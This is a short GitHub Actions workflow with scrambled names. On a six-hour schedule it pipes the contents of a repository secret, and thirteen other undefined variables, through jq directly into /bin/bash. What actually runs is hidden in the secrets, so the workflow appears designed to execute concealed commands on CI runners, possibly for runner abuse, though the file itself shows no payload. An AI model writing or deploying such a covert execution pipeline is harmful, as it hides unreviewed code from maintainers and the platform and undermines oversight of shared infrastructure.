name: jinweixiang9012
on:
  workflow_dispatch:
  schedule:
    - cron: '24 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jinweixiang9012
        env:
          jw634: ${{ secrets.jw634 }}
        run: |
          echo $jw634 | jq -r .ku789 | /bin/bash
          echo $ktpsl8 | jq -r .cbjk34892 | /bin/bash
          echo $lo897 | jq -r .zvwr5 | /bin/bash
          echo $f8243 | jq -r .olcs4880 | /bin/bash
          echo $fwi44224 | jq -r .f488 | /bin/bash
          echo $saf00227 | jq -r .wrn463 | /bin/bash
          echo $tobz39 | jq -r .vfj89 | /bin/bash
          echo $nn8394 | jq -r .kht52 | /bin/bash
          echo $rsylf00 | jq -r .ivwx53607 | /bin/bash
          echo $fvlz78335 | jq -r .s43 | /bin/bash
          echo $o818 | jq -r .jj66 | /bin/bash
          echo $gvjco1944 | jq -r .zi05677 | /bin/bash
          echo $vww215 | jq -r .cob8357 | /bin/bash
          echo $m6 | jq -r .m332 | /bin/bash

